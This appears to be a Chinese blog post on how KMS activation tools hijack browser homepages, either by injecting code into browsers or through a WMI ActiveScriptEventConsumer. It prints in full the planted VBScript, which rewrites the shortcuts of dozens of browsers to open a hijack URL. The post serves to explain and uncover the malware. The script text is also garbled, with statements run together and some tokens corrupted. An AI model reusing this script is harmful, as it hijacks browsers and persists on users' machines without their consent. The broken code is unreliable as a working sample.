方法一
直接修改浏览器的名字,这种事最简单的方法,KMS(小马激活工具)通过搜索相关的关键字。比如chrome、google、360等一些主流浏览器,对其进行动态代码注入。
方法二
通过WMI(Windows Management Instrumentation)| 下载地址进行修改,
打开WMI Event Viewer:
点击左上角的笔的图标(Register For Events),在弹出的Connect to namespace的框直接点OK,Login的页面也直接点OK。点开左侧栏的EventFilter,再点击下级目录的项目:
在右侧栏右键点击ActiveScriptEventConsumer,并通过view instant properties查看属性:
在Script Text那一栏我们可以看到这段脚本:
On Error Resume NextConst link = "http://hao.qquu8.com/?m=yx&r=j"
Const link360 = "http://hao.qquu8.com/?m=yx&r=j&s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\sjtul\Desktop,C:\Users\sjtul\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\sjtul\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\sjtul\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\sjtul\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
browsersArr = split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")
For Each browser In browsersArroDic.Add LCase(browser), browser
Next
lnkpathsArr = split(lnkpaths,",")
Set oFolders = CreateObject("scripting.dictionary")
For Each lnkpath In lnkpathsArroFolders.Add lnkpath, lnkpath
Next
Set fso = CreateObject("Scripting.Filesystemobject")
Set WshShell = CreateObject("Wscript.Shell")
For Each oFolder In oFoldersIf fso.FolderExists(oFolder) ThenFor Each file In fso.GetFolder(oFolder).FilesIf LCase(fso.GetExtensionName(file.Path)) = "lnk" ThenSet oShellLink = WshShell.CreateShortcut(file.Path)path = oShellLink.TargetPathname = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)If oDic.Exists(LCase(name)) ThenIf LCase(name) = LCase("360se.exe") ThenoDicShellLink.Arguments = link360ElseoShellLink.Arguments = linkEnd IfIf file.Attributes And 1 Thenfsoile.Attributes = file.Attributes - 1End IfoShellLink.SaveEnd IfEnd IfNextEnd If
Next
其他激活工具
- 俄罗斯人开发的工具
- 参考文章
